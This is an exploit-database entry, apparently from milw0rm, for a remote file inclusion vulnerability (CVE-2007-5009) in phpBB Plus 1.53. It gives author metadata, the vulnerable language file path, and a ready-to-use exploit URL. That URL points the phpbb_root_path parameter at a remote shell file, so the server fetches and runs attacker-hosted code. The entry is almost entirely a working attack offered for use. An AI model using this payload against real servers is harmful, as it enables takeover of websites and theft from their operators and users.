phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion

Author: Mehrad
type: webapps
platform: php
port: 
date_added: 2007-09-19 
date_updated:  
verified: 1 
codes: OSVDB-38265;CVE-2007-5009 
tags: 
aliases:  
screenshot_url:  
application_url: 

AUTHOR = Mehrad Ansari Targhi
E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# milw0rm.com [2007-09-20]